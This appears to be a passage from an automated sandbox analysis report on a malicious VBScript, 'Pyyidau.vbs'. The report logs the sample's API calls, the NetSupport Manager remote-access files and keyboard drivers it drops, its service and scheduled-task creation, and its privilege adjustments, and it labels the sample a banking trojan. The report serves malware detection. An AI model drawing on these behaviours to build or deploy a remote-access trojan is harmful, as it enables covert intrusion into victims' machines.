Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}
Source: C:\Windows\Installer\MSIF373.tmp Code function: 25_2_005D80C0 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,ControlService,GetLastError,GetLastError,GetLastError,QueryServiceStatus,QueryServiceStatus,Sleep,Sleep,QueryServiceStatus,wsprintfW,wsprintfW,GetComputerNameW,GetCurrentDirectoryW,wsprintfW,FindFirstFileW,GetCurrentDirectoryW,DeleteFileW,FindNextFileW,FindClose,GetCurrentDirectoryW,RemoveDirectoryW,DeleteService,GetLastError,CloseServiceHandle,OpenServiceW,GetLastError,QueryServiceConfigW,ChangeServiceConfigW,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,OpenSCManagerW,GetLastError,CloseServiceHandle
Source: C:\Windows\Installer\MSIF373.tmp Code function: 25_2_005D4420 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx
Source: C:\Windows\Installer\MSIF373.tmp Code function: 25_2_005DD040 ExitWindowsEx
Source: C:\Windows\Installer\MSIF985.tmp Code function: 27_2_00914420 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx
Source: C:\Windows\Installer\MSIF985.tmp Code function: 27_2_0091D040 ExitWindowsEx
Source: C:\Windows\Installer\MSI1387.tmp Code function: 29_2_00FE4420 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx
Source: C:\Windows\Installer\MSI1387.tmp Code function: 29_2_00FED040 ExitWindowsEx
Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\NetSupport\NetSupport Manager\x64\gdihook5.sys
Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe File created: C:\Windows\system32\drivers\nskbfltr.sys
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI23E6.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2955.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3741.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3771.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI37C0.tmpJump to behavior
                                Source: C:\Windows\Installer\MSI1387.tmpFile created: C:\Windows\SysWOW64\pcimsg.dll
                                Source: C:\Windows\Installer\MSI1387.tmpFile created: C:\Windows\setupact.log
                                Source: C:\Windows\Installer\MSI1387.tmpFile created: C:\Windows\SysWOW64\drivers\Msft_Kernel_nskbfltr_01005.Wdf
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeFile created: C:\Windows\system32\client32provider.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeFile created: C:\Windows\system32\drivers\nskbfltr.sys
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeFile created: C:\Windows\system32\drivers\nskbfltr2.sys
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5
                                Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSIE5EC.tmpJump to behavior
                                Source: C:\Windows\SysWOW64\cscript.exe Process token adjusted: Load Driver
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe Process token adjusted: Security
                                Source: Pyyidau.vbs Initial sample: Strings found which are bigger than 50
                                Source: WdfCoInstaller01005.dll.20.dr Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 1351826 bytes, 5 files, at 0x44 +A "Wdf01000.inf" +A "Wdf.cat", flags 0x4, ID 18394, number 1, extra bytes 20 in head, 62 datablocks, 0x1503 compression
                                Source: api-ms-win-crt-conio-l1-1-0.dll.20.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-crt-private-l1-1-0.dll.20.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-interlocked-l1-1-0.dll.20.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-crt-time-l1-1-0.dll.20.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-console-l1-1-0.dll.20.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-util-l1-1-0.dll.20.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-crt-math-l1-1-0.dll.20.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-localization-l1-2-0.dll.20.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-string-l1-1-0.dll.20.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-file-l2-1-0.dll.20.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-crt-environment-l1-1-0.dll.20.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-crt-locale-l1-1-0.dll.20.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-crt-heap-l1-1-0.dll.20.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-crt-convert-l1-1-0.dll.20.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-processthreads-l1-1-0.dll.20.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-rtlsupport-l1-1-0.dll.20.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-debug-l1-1-0.dll.20.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-libraryloader-l1-1-0.dll.20.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-file-l1-1-0.dll.20.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-file-l1-2-0.dll.20.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-errorhandling-l1-1-0.dll.20.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-processthreads-l1-1-1.dll.20.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-profile-l1-1-0.dll.20.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-heap-l1-1-0.dll.20.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-namedpipe-l1-1-0.dll.20.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-crt-stdio-l1-1-0.dll.20.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-crt-multibyte-l1-1-0.dll.20.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-crt-filesystem-l1-1-0.dll.20.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-handle-l1-1-0.dll.20.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-synch-l1-1-0.dll.20.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-sysinfo-l1-1-0.dll.20.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-synch-l1-2-0.dll.20.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-crt-utility-l1-1-0.dll.20.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-crt-string-l1-1-0.dll.20.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-timezone-l1-1-0.dll.20.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-processenvironment-l1-1-0.dll.20.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-memory-l1-1-0.dll.20.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-datetime-l1-1-0.dll.20.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-crt-runtime-l1-1-0.dll.20.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-crt-process-l1-1-0.dll.20.dr Static PE information: No import functions for PE file found
                                Source: Pyyidau.vbs.exe, 00000004.00000002.114083339160.0000000010131000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcredist_x86.exe~/ vs Pyyidau.vbs
                                Source: Pyyidau.vbs.exe, 00000004.00000002.113950407001.0000000004F16000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFileName vs Pyyidau.vbs
                                Source: Pyyidau.vbs.exe, 00000004.00000002.114022026314.000000000DB61000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcredist_x86.exe~/ vs Pyyidau.vbs
                                Source: Pyyidau.vbs.exe, 00000004.00000002.113948697299.0000000003119000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Pyyidau.vbs
                                Source: Pyyidau.vbs.exe, 00000004.00000000.113910990592.0000000000CB4000.00000002.00000001.01000000.00000006.sdmp Binary or memory string: OriginalFilenamePowerShell.EXEj% vs Pyyidau.vbs
                                Source: Pyyidau.vbs.exe, 00000004.00000002.114108278317.0000000011131000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcredist_x86.exe~/ vs Pyyidau.vbs
                                Source: Pyyidau.vbs.exe, 00000004.00000002.113950407001.0000000004EC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs Pyyidau.vbs
                                Source: Pyyidau.vbs.exe, 00000004.00000002.113967321914.0000000009530000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Pyyidau.vbs
                                Source: Pyyidau.vbs.exe, 00000004.00000002.113967583372.0000000009590000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Pyyidau.vbs
                                Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 2299
                                Source: WdfCoInstaller01005.dll.20.dr Static PE information: Section: .rsrc ZLIB complexity 0.9963142759691381
                                Source: 4.2.Pyyidau.vbs.exe.9590000.3.raw.unpack, Task.cs Task registration methods: 'RegisterChanges', 'CreateTask'
                                Source: 4.2.Pyyidau.vbs.exe.9590000.3.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                                Source: 4.2.Pyyidau.vbs.exe.9590000.3.raw.unpack, TaskService.cs Task registration methods: 'CreateFromToken'
                                Source: 4.2.Pyyidau.vbs.exe.9590000.3.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                                Source: 4.2.Pyyidau.vbs.exe.9590000.3.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                                Source: 4.2.Pyyidau.vbs.exe.9590000.3.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                                Source: 4.2.Pyyidau.vbs.exe.9590000.3.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                                Source: 4.2.Pyyidau.vbs.exe.9590000.3.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                                Source: 4.2.Pyyidau.vbs.exe.9590000.3.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                                Source: 4.2.Pyyidau.vbs.exe.9590000.3.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                Source: classification engine Classification label: mal100.bank.troj.expl.evad.winVBS@62/246@4/3
                                Source: C:\Windows\Installer\MSIF373.tmp Code function: 25_2_005AC060 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges
                                Source: C:\Windows\Installer\MSIF373.tmp Code function: 25_2_005AC0F0 AdjustTokenPrivileges,CloseHandle
                                Source: C:\Windows\Installer\MSIF373.tmp Code function: 25_2_005D22C0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetTokenInformation,GetTokenInformation,GetTokenInformation,LookupPrivilegeNameW,CloseHandle
                                Source: C:\Windows\Installer\MSIF373.tmp Code function: 25_2_005D4420 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx
                                Source: C:\Windows\Installer\MSIF373.tmp Code function: 25_2_005AEAB0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle
                                Source: C:\Windows\Installer\MSIF373.tmp Code function: 25_2_005E15D0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError
                                Source: C:\Windows\Installer\MSIF985.tmp Code function: 27_2_008EC0F0 AdjustTokenPrivileges,CloseHandle
                                Source: C:\Windows\Installer\MSIF985.tmp Code function: 27_2_008EC060 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges
                                Source: C:\Windows\Installer\MSIF985.tmp Code function: 27_2_009122C0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetTokenInformation,GetTokenInformation,GetTokenInformation,LookupPrivilegeNameW,CloseHandle
                                Source: C:\Windows\Installer\MSIF985.tmp Code function: 27_2_00914420 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx
                                Source: C:\Windows\Installer\MSIF985.tmp Code function: 27_2_008EEAB0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle
                                Source: C:\Windows\Installer\MSIF985.tmp Code function: 27_2_009215D0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError
                                Source: C:\Windows\Installer\MSI1387.tmp Code function: 29_2_00FBC0F0 AdjustTokenPrivileges,CloseHandle
                                Source: C:\Windows\Installer\MSI1387.tmp Code function: 29_2_00FBC060 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges
                                Source: C:\Windows\Installer\MSI1387.tmp Code function: 29_2_00FE22C0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetTokenInformation,GetTokenInformation,GetTokenInformation,LookupPrivilegeNameW,CloseHandle
                                Source: C:\Windows\Installer\MSI1387.tmp Code function: 29_2_00FE4420 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx
                                Source: C:\Windows\Installer\MSI1387.tmp Code function: 29_2_00FBEAB0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle
                                Source: C:\Windows\Installer\MSI1387.tmp Code function: 29_2_00FF15D0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError
                                Source: C:\Windows\Installer\MSIF373.tmp Code function: 25_2_005DB310 OpenSCManagerW,GetLastError,CloseServiceHandle,wsprintfW,CloseServiceHandle,CloseServiceHandle,OpenServiceW,QueryServiceConfigW,ChangeServiceConfigW,CloseServiceHandle,CreateServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,GetSystemDirectoryW,OpenSCManagerW,FreeLibrary,GetSystemDirectoryW,OpenSCManagerW,GetLastError,FreeLibrary,CloseServiceHandle
                                Source: C:\Windows\Installer\MSIF373.tmp Code function: 25_2_005DF880 CreateServiceW,GetLastError,StartServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle
                                Source: C:\Windows\Installer\MSIF373.tmp Code function: 25_2_005ABB90 CreateServiceW,GetLastError,FreeLibrary,CloseServiceHandle,FreeLibrary
                                Source: C:\Windows\Installer\MSIF373.tmp Code function: 25_2_00599C70 CreateServiceW,GetLastError
                                Source: C:\Windows\Installer\MSIF985.tmp Code function: 27_2_0091B310 OpenSCManagerW,GetLastError,CloseServiceHandle,wsprintfW,CloseServiceHandle,CloseServiceHandle,OpenServiceW,QueryServiceConfigW,ChangeServiceConfigW,CloseServiceHandle,CreateServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,GetSystemDirectoryW,OpenSCManagerW,FreeLibrary,GetSystemDirectoryW,OpenSCManagerW,GetLastError,FreeLibrary,CloseServiceHandle
                                Source: C:\Windows\Installer\MSIF985.tmp Code function: 27_2_0091F880 CreateServiceW,GetLastError,StartServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle
                                Source: C:\Windows\Installer\MSIF985.tmp Code function: 27_2_008EBB90 CreateServiceW,GetLastError,FreeLibrary,CloseServiceHandle,FreeLibrary
                                Source: C:\Windows\Installer\MSIF985.tmp Code function: 27_2_008D9C70 CreateServiceW,GetLastError
                                Source: C:\Windows\Installer\MSI1387.tmp Code function: 29_2_00FEB310 OpenSCManagerW,GetLastError,CloseServiceHandle,wsprintfW,CloseServiceHandle,CloseServiceHandle,OpenServiceW,QueryServiceConfigW,ChangeServiceConfigW,CloseServiceHandle,CreateServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,GetSystemDirectoryW,OpenSCManagerW,FreeLibrary,GetSystemDirectoryW,OpenSCManagerW,GetLastError,FreeLibrary,CloseServiceHandle
                                Source: C:\Windows\Installer\MSI1387.tmp Code function: 29_2_00FBBB90 CreateServiceW,GetLastError,FreeLibrary,CloseServiceHandle,FreeLibrary
                                Source: C:\Windows\Installer\MSI1387.tmp Code function: 29_2_00FEF880 CreateServiceW,GetLastError,StartServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle
                                Source: C:\Windows\Installer\MSI1387.tmp Code function: 29_2_00FA9C70 CreateServiceW,GetLastError
                                Source: C:\Windows\Installer\MSIF373.tmp Code function: 25_2_005A8380 CoInitialize,CoCreateInstance,CoUninitialize
                                Source: C:\Windows\Installer\MSIF373.tmp Code function: 25_2_005B8FB0 FindResourceW,LoadResource,LockResource,GetDC,SelectPalette,RealizePalette,CreateDIBitmap,ReleaseDC,DeleteObject
                                Source: C:\Windows\Installer\MSIF373.tmp Code function: 25_2_005D9630 OpenSCManagerW,GetLastError,GetLastError,OpenServiceW,GetLastError,QueryServiceStatus,QueryServiceStatus,GetSystemDirectoryW,CreateProcessW,WaitForSingleObject,CloseHandle,CloseHandle,CloseHandle,QueryServiceStatus,ControlService,QueryServiceStatus,Sleep,QueryServiceStatus,GetLastError,Sleep,QueryServiceStatus,Sleep,QueryServiceStatus,StartServiceW,QueryServiceStatus,Sleep,QueryServiceStatus,RegisterEventSourceW,GetComputerNameW,wsprintfW,ReportEventW,DeregisterEventSource,GetLastError,CloseServiceHandle,CloseServiceHandle,Sleep,GetSystemDirectoryW
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\NetSupport
                                Source: C:\Windows\System32\cmd.exe File created: C:\Users\user\Desktop\Pyyidau.vbs.exe
                                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8944:120:WilError_03
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe Mutant created: NULL
                                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:476:304:WilStaging_02
                                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8944:304:WilStaging_02
                                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8088:120:WilError_03
                                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6856:120:WilError_03
                                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8088:304:WilStaging_02
                                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6856:304:WilStaging_02
                                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:476:120:WilError_03
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oglvszav.vxt.ps1
                                Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pyyidau.vbs"
                                Source: C:\Windows\Installer\MSIF373.tmp Command line argument: module=%s (25_2_005DDDD0)
                                Source: C:\Windows\Installer\MSIF373.tmp Command line argument: V14.10 (25_2_005DDDD0)
                                Source: C:\Windows\Installer\MSIF373.tmp Command line argument: ver=%s (25_2_005DDDD0)
                                Source: C:\Windows\Installer\MSIF373.tmp Command line argument: /ec (25_2_005DDDD0)
                                Source: C:\Windows\Installer\MSIF373.tmp Command line argument: /EC (25_2_005DDDD0)
                                Source: C:\Windows\Installer\MSIF373.tmp Command line argument: PCD (25_2_005DDDD0)
                                Source: C:\Windows\Installer\MSIF373.tmp Command line argument: NSM (25_2_005DDDD0)
                                Source: C:\Windows\Installer\MSIF373.tmp Command line argument: system.ini (25_2_005DDDD0)
                                Source: C:\Windows\Installer\MSIF373.tmp Command line argument: display.drv (25_2_005DDDD0)
                                Source: C:\Windows\Installer\MSIF373.tmp Command line argument: boot (25_2_005DDDD0)
                                Source: C:\Windows\Installer\MSIF373.tmp Command line argument: shellscr.drv (25_2_005DDDD0)
                                Source: C:\Windows\Installer\MSIF373.tmp Command line argument: winexec.ok (25_2_005DDDD0)
                                Source: C:\Windows\Installer\MSIF373.tmp Command line argument: V15.10 (25_2_005DDDD0)
                                Source: C:\Windows\Installer\MSIF985.tmp Command line argument: module=%s (27_2_0091DDD0)
                                Source: C:\Windows\Installer\MSIF985.tmp Command line argument: V14.10 (27_2_0091DDD0)
                                Source: C:\Windows\Installer\MSIF985.tmp Command line argument: ver=%s (27_2_0091DDD0)
                                Source: C:\Windows\Installer\MSIF985.tmp Command line argument: /ec (27_2_0091DDD0)
                                Source: C:\Windows\Installer\MSIF985.tmp Command line argument: /EC (27_2_0091DDD0)
                                Source: C:\Windows\Installer\MSIF985.tmp Command line argument: PCD (27_2_0091DDD0)
                                Source: C:\Windows\Installer\MSIF985.tmp Command line argument: NSM (27_2_0091DDD0)
                                Source: C:\Windows\Installer\MSIF985.tmp Command line argument: system.ini (27_2_0091DDD0)
                                Source: C:\Windows\Installer\MSIF985.tmp Command line argument: display.drv (27_2_0091DDD0)
                                Source: C:\Windows\Installer\MSIF985.tmp Command line argument: boot (27_2_0091DDD0)
                                Source: C:\Windows\Installer\MSIF985.tmp Command line argument: shellscr.drv (27_2_0091DDD0)
                                Source: C:\Windows\Installer\MSIF985.tmp Command line argument: winexec.ok (27_2_0091DDD0)
                                Source: C:\Windows\Installer\MSIF985.tmp Command line argument: V15.10 (27_2_0091DDD0)
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe Command line argument: Client (28_2_00752031)
                                Source: C:\Windows\Installer\MSI1387.tmp Command line argument: module=%s (29_2_00FEDDD0)
                                Source: C:\Windows\Installer\MSI1387.tmp Command line argument: V14.10 (29_2_00FEDDD0)
                                Source: C:\Windows\Installer\MSI1387.tmp Command line argument: ver=%s (29_2_00FEDDD0)
                                Source: C:\Windows\Installer\MSI1387.tmp Command line argument: /ec (29_2_00FEDDD0)
                                Source: C:\Windows\Installer\MSI1387.tmp Command line argument: /EC (29_2_00FEDDD0)
                                Source: C:\Windows\Installer\MSI1387.tmp Command line argument: PCD (29_2_00FEDDD0)
                                Source: C:\Windows\Installer\MSI1387.tmp Command line argument: NSM (29_2_00FEDDD0)
                                Source: C:\Windows\Installer\MSI1387.tmp Command line argument: nsmvxd.386 (29_2_00FEDDD0)
                                Source: C:\Windows\Installer\MSI1387.tmp Command line argument: nsmvga.drv (29_2_00FEDDD0)
                                Source: C:\Windows\Installer\MSI1387.tmp Command line argument: system.ini (29_2_00FEDDD0)
                                Source: C:\Windows\Installer\MSI1387.tmp Command line argument: display.drv (29_2_00FEDDD0)
                                Source: C:\Windows\Installer\MSI1387.tmp Command line argument: boot (29_2_00FEDDD0)
                                Source: C:\Windows\Installer\MSI1387.tmp Command line argument: shellscr.drv (29_2_00FEDDD0)
                                Source: C:\Windows\Installer\MSI1387.tmp Command line argument: winexec.ok (29_2_00FEDDD0)
                                Source: C:\Windows\Installer\MSI1387.tmp Command line argument: V15.10 (29_2_00FEDDD0)
                                Source: C:\Windows\Installer\MSI1387.tmp Command line argument: PCIAX.DLL (29_2_00FEDDD0)
                                Source: C:\Windows\Installer\MSI1387.tmp Command line argument: Done: (29_2_00FEDDD0)
                                Source: C:\Windows\Installer\MSI1387.tmp Command line argument: Restart (29_2_00FEDDD0)
                                Source: C:\Windows\Installer\MSI1387.tmp Command line argument: Exit (29_2_00FEDDD0)
                                Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
                                Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                                Source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO MessageTable VALUES(%d, '%s', '%s', '%s', %d, %d, %d, '%s', '%s', %d, %I64u, %d, %d);
                                Source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO ClientTable VALUES(%d, '%s', '%s', '%s', '%s', %d, %I64u);
                                Source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS ClientTable(ClientID INT,ComputerName VARCHAR(100),IPAddress VARCHAR(40),MAC VARCHAR(12),Hostname VARCHAR(100),AppType INT,Time BIGINT);
                                Source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO RecipientTable VALUES(%d, %d,%I64u, %d, '%s', '%s', %I64u);
                                Source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO FileLinks VALUES('%s', '%s', '%s');
                                Source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS MessageTable(MessageID INT,UniqueID VARCHAR(38),Text VARCHAR(256),Caption VARCHAR(80),Timeout INT,Flags INT,AppType INT,Operator VARCHAR(80),User VARCHAR(80),BroadcastFlags INT,Time BIGINT,RecipientCount INT,AcknowledgeCount INT);
                                Source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO ParamTable VALUES('%s', '%s');
                                Source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS ParamTable(Param VARCHAR(100), Value VARCHAR(100));
